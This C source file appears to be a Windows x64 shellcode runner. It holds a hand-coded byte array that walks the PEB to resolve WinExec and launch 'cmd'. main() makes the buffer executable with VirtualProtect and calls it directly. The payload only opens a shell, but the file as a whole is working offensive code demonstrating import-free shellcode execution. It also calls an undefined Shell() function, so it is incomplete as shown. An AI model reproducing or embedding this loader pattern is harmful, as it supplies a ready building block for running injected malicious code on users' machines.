#include <stdio.h>
#include <Windows.h>
UCHAR Shellcode[] = 
{
	0x56,0x57,0x55,0x52,0x51,0x48,0xC7,0xC2,0x60,0x00,0x00,0x00,0x65,0x48,0x8B,0x32,0x48,0x8B,0x76,0x18,0x48,
	0x8B,0x76,0x10,0x48,0xAD,0x48,0x8B,0x30,0x48,0x8B,0x7E,0x30,0x03,0x57,0x3C,0x8B,0x5C,0x3A,0x28,0x8B,0x74,
	0x3B,0x20,0x48,0x03,0xF7,0x8B,0x54,0x3B,0x24,0x48,0x33,0xC9,0x51,0xC6,0x04,0x24,0x57,0xC6,0x44,0x24,0x01,
	0x69,0xC6,0x44,0x24,0x02,0x6E,0xC6,0x44,0x24,0x03,0x45,0x8B,0x0C,0x24,0x0F,0xB7,0x2C,0x3A,0x8D,0x52,0x02,
	0xAD,0x39,0x0C,0x38,0x75,0xF3,0x59,0x8B,0x74,0x3B,0x1C,0x48,0x03,0xF7,0x8B,0x34,0xAE,0x48,0x03,0xFE,0x48,
	0x8D,0x0D,0x0B,0x00,0x00,0x00,0x48,0x33,0xD2,0xFF,0xD7,0x59,0x5A,0x5D,0x5F,0x5E,0xC3,0x63,0x6D,0x64/*,0x20,
	0x2F,0x63,0x20,0x6E,0x6F,0x74,0x65,0x70,0x61,0x64*/,0x00,
};
void Shell();
int main()
{
	DWORD Old = 0;
	Shell();
	printf("%lu\n",sizeof(Shellcode));
	VirtualProtect(Shellcode,1,PAGE_EXECUTE_READWRITE,&Old);
	((void(*)())Shellcode)();

	return 0;
}